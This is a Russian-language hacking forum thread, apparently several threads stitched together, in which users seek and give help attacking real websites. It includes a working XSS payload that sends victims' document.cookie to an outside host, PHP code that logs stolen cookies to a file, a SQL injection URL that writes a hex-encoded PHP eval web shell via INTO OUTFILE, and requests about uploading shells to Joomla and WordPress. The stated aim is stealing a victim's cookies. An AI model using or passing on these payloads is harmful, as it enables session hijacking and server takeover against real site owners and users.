Во многих статьях идет описания ворования куков с помощью xss. Я как бы нашел все но вот уже часа 2 не догоняю что делает картинка 1x1px и куда сохрянятся куки? во многих статьях написанно про картинку а что она делает? куда куки сохранятся?
можно ли в joomla 1.0.15 залить шелл при условии, что компоненты ставить нельзя, php= safe mode? установленных бажных компонентов на первый взгляд нет, вход в админку имеется
Если file_priv = Y. Найди полный путь. Потому То http://www.ru/vn84.php?id=-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,0x3C3F206576616C28245F524551554553545B635D293B203F3E,null,null+INTO+OUTFILE+'/полный/путь/inaex.php'--+ Далее если всё норм. Нужно allow_url_fopen = on. (Да да inbex.php)
Я знаю вы поможете мне вы умные все ) Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве вот примерно такая Code: ?username='><script>img = new Image();img.src="[COLOR=DarkOrange]http://site.ru/kartinka.gif[/COLOR]?"+document.cookie;</script> < На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif. Помогите реализовать мои коварные планы
Это должна быть не просто картинка, а PHP-скрипт, который записывает переданные ему данные куда - либо.
Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script> PHP: function cookie(){ window.location="cookie.php?data="+document.cookie; } в cookie.php PHP: <?PHP $file=fopen('cookie.txt', 'A+'); fwrite($file, $_GET['data']); fclose($file); ?> ps Файл cookie.txt должны быть разрешены для записи.
Ну да,скорее всего так и есть. Но как подключиться к фтп на udp порту и какой синтаксис это команды? NetCat ничего не выводит,хотя соединение не обрывает.
Я думаю тебе надо регатся на тут,нажимаеш завести ID регаешся и изменят на твоем запросе эту часть так: потом куки найдеш тута наберив твой ид и пасс
Сделал как ты сказал провери файл cookie.txt он пустой посмотрел исходный код нашел место куда записался скрипт вот что там PHP: <input type='text' maxlength='100' size='14' class='text' id='username' name='username' value='\'><script src=http://site.ru/js.js>cookie()</script> <'> <br><br>
Сделал как ты сказал но поставился фильтр Code: <script>img=new Image(); img.src=\"http://web-defence.ru/snif/s.gif?id=850'> тут если " идет то он перед ней ставит \
Есть у кого еще какие нибудь предложения по самой простой теме Добавление: Если в запросе писать " то перед " он ставит знак \ из за этого способ YuNi|[c не работает так как там код c " Code: <script>img=new Image(); img.src=[COLOR=DarkOrange]"[/COLOR]http://web-defence.ru/snif/s.gif?id=850'>< Пробовал без " все равно лог не пришел не какой. Способ от Ctacok'a сделал все как он сказал но в cookie.txt не что не сохранилось права стоят 777 Добавление: Пробовал кодировать что бы обойти фильтр но лог так и не пришел
без " твой запрос не будеть правильным, но если кавычки фильтруется тогда незнаю, у меня норм работает через веб дефенс
l1ght выполнил это(http://www.site.ru/vn84.php?id=-1+union+select+*+from+(select+*+from+admin+join+admin+a+join+admin+b)c--+1). как не удивительно, но открылся страница по продукциям и докумнетаниями этого конторы. можно считать, что ваш запрос ничего не выдал, если не считать, что не понятные цифры появились на странице (со странным названием страницы: opinions, хотя там документации и дистрибутив находится): gisTy Спасибо за разяснение. А эта информация в данным ситуации нужен? Или это как определись платформу удаленного жертвы? Ctacok Не очень понал... можно тут подробнее ? Не понимаю о каком пути идет речь.. (может там надо написать путь своего веб шелла?)
Есть возможность загрузить php файл вместо изображения, только неизвестен путь на сервере, куда будет загружен этот файл. Есть возможность как то обратиться к этому файлу, что бы он выдал своё местонахождение или существуют другие способы?
можеть кто раскрутит инъекцию, никак сам не могу. Вроде блинд, но правильный запрос не могу составить нашел через order by количество полей(9) принтебл поля нету. Как правильно составить запрос на блинд иъекцию в такой ситуации
спс но там версия WordPress 2.7.2-alpha и багов не нашел пока. Видимо надо залить шелл через соседные сайты. Хотелось бы посмотреть видео какой нит типа лом сервака заливкой шелла через соседный сайт